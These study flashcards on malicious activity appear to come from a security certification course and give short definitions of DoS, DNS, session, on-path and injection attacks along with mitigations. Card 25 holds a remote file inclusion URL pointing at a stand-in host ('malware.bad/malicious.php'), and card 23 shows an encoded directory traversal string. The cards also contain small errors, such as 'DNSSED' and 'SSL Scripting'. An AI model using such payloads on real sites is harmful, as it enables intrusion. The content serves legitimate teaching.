Malicious Activity Flashcards

Objective 2.4 - Page 267

1
Q

DoS (Denial of Service) Definition

A

Used to describe an attack that attempts to make a computer or server’s resources unavailable

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

DDoS (Distributed Denial of Service) Variants

A

DoS, Amplified DDoS, Reflected DDoS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

DNS Attack Types

A
  • DNS Cache Poisoning
  • DNS Amplification
  • DNS Tunneling
  • Domain Hijacking
  • DNS Zone Transfer
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Directory Traversal Attacks

A

Exploiting insufficient security validation of user-supplied input file names

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Privilege Escalation Attack

A

Exploiting system vulnerability to gain elevated access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Replay Attacks

A

Type of network-based attack where valid data transmissions are maliciously or fraudulently re-broadcast, repeated, or delayed
Involves intercepting data, analyzing it, and deciding whether to retransmit it later
Application - Email \ Online shopping \ social media

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Session Hijacking

A

Attacker takes over a user session to gain unauthorized access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Replay Vs Session Hijacking

A
  • In a Session Hijack, the attacker alters real-time data transmission
  • In a Replay Attack, the attacker intercepts the data and then can decide later whether to retransmit the data
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Malicious Code Injection Attacks

A

Introduction of harmful code into a program or system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Indicators of Compromise (IoC)
(Examples listed)

A

Account lockout
Concurrent session usage
Blocked content
Impossible travel
Resource consumption
Inaccessibility
Out-of-cycle logging
Published documents indicating hacking
Missing logs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Ping Flood (Flood Attacks type)

A

Overloading a server with ICMP echo requests (pings)
Mitigation - often countered by blocking echo replies

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

SYN Flood (Flood Attacks type)

A

Initiating multiple TCP sessions but not completing the 3-way handshake and consumes server resources and prevents legitimate connections
Mitigation \ Countermeasures
- Flood guard \ Timeout configurations \ Intrusion Prevention systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Permanent Denial of Service (PDOS) Attack

A

Exploits security flaws to break a networking device permanently by re-flashing its firmware
Requires a full firmware reload to bring the device back online

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Fork Bomb

A

Attack creates a large number of processes, consuming processing power
Not considered a worm, as it doesn’t infect programs or use the network
Self-replicating nature causes a denial of service condition

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

DNS Amplification

A

Specialized DDoS that allows an attacker to initiate DNS requests from a spoof IP address to flood a website

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Surviving and Preventing DoS \ DDoS Attacks (page 270)

A
  • Black Hole or Sinkhole
  • IPS
  • Elastic Cloud Infrastructure
  • Specialized Cloud Service Providers
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Black Hole or Sinkhole (Surviving and Preventing DoS\DDoS)

A

Routes attacking IP traffic to a non-existent server through a null interface and it is effective but temporary solution

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

DNS Cache Poisoning (DNS Spoofing)

A

Corrupts a DNS resolver’s cache with false information and redirects users to malicious websites
Mitigation - Use DNSSED (Domain Name System Security Extensions) to add digital signatures to DNS data
Mitigation - Implement secure network configurations and firewalls to protect DNS servers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

DNS Amplification Attacks

A

Overwhelms a target system with DNS response traffic by exploiting the DNS resolution process
Spoofed DNS queries sent to open DNS servers
Mitigation - Limit the size of DNS responses \ Rate limit DNS response traffic to reduce the impact

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

DNS Tunneling

A

Encapsulates non-DNS traffic (e.g., HTTP, SSH) over port 53
Attempts to bypass firewall rules for command and control or data exfiltration
Mitigation - Monitor and analyze DNS logs for unusual patterns indicating tunneling

21
Q

Domain Hijacking (Domain Theft)

A

Unauthorized change of domain registration
May lead to loss of website control and redirection to malicious sites

22
Q

DNS Zone Transfer Attacks

A

Attempts to obtain an entire DNS zone data copy
Exposes sensitive information about a domain’s network infrastructure
Could be used for reconnaissance in future attacks

23
Q

Directory Traversal Attack

A
  • An injection attack occurs when the attacker inserts malicious code through an application interface
  • Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
  • Attackers may use encoding to hide directory traversal attempts (%2e%2e%2f represents . . / )
24
Q

File Inclusion

A

Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor

25
Q

Remote File Inclusion

A

An attacker executes a script to inject a remote file into the web app or website
https://diontraining.com/login.php?
user=http://malware.bad/malicious.php

26
Q

Arbitrary Code Execution

A

Vulnerability allows an attacker to run their code without restrictions

27
Q

Remote Code Execution

A

Type of arbitrary code execution that occurs remotely, often over the internet

28
Q

Rootkits

A

Class of malware that conceals its presence by modifying system files, often at the kernel level
Ring Zero - Kernel with highest privileges
Rings 1 to 3 - User-level components with decreasing privileges

29
Q

Session Management

A
  • Fundamental security component in web applications
  • Enables web applications to uniquely identify a user across a number of different actions and requests, while keeping the state of the data generated by the user and ensuring it is assigned to that userC
30
Q

Cookie

A

Text file used to store information about a user when they visit a website
- Cookies must be protected because they contain client information that is being transmitted across the Internet

31
Q

Session Vs Persistent Cookies

A

Session - Non-persistent, reside in memory, and are deleted when the browser instance is closed
Persistent - Cookies that are stored in the browser cache until they are deleted by the user or pass a defined expiration date

32
Q

Session Hijacking

A
  • A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host’s IP address
  • Session hijacking attacks can occur through the theft or modification of cookies
33
Q

Session Prediction Attacks

A

Modifies the contents of a cookie after it has been generated and sent by the web service to the client’s browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app

34
Q

On-Path Attack

A

An attack where the attacker positions their workstation logically between two hosts during communication
- The attacker transparently captures, monitors, and relays communications between those hosts

35
Q

Methods of On-Path Attacks

A

ARP Poisoning
DNS Poisoning
Rogue Wireless Access Point
Rogue Hub or Switch

36
Q

ARP Poisoning

A

Manipulating Address Resolution Protocol (ARP) tables to redirect network traffic

37
Q

DNS Poisoning

A

Altering DNS responses to reroute traffic

38
Q

Rogue Wireless Access Point

A

Creating a fake wireless access point to intercept traffic

39
Q

Rogue Hub or Switch

A

Introducing a malicious hub or switch to capture data on a wired network

40
Q

Relay Attack

A

The attacker becomes part of the conversation between two hosts
- Serves as a proxy and can read or modify communications between the hosts
- Any traffic between the client and server goes through the attacker

41
Q

SSL Scripting

A

An attack that tricks the encryption application into presenting an HTTP connection instead of HTTPS
- Enables attackers to capture unencrypted data when the user
believes they are using a secure connection

42
Q

Downgrade Attack

A

An attacker forces a client or server to abandon a higher security mode in favor of a lower security mode

43
Q

Lightweight Directory Access Protocol (LDAP)

A

An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network

44
Q

Injection Attacks

A

LDAP Injection
Command Injection
Process Injection

45
Q

LDAP Injection

A

An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input
- Use input validation and input sanitization as protection against an LDAP injection attack

46
Q

Command Injection

A

Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application

47
Q

Process Injection

A

Method of executing arbitrary code in the address space of a separate live process

48
Q

Indicators of Compromise (IoC)

A

Pieces of forensic data that identify potentially malicious activity on a network or system
- Serves as digital evidence that a security breach has occurred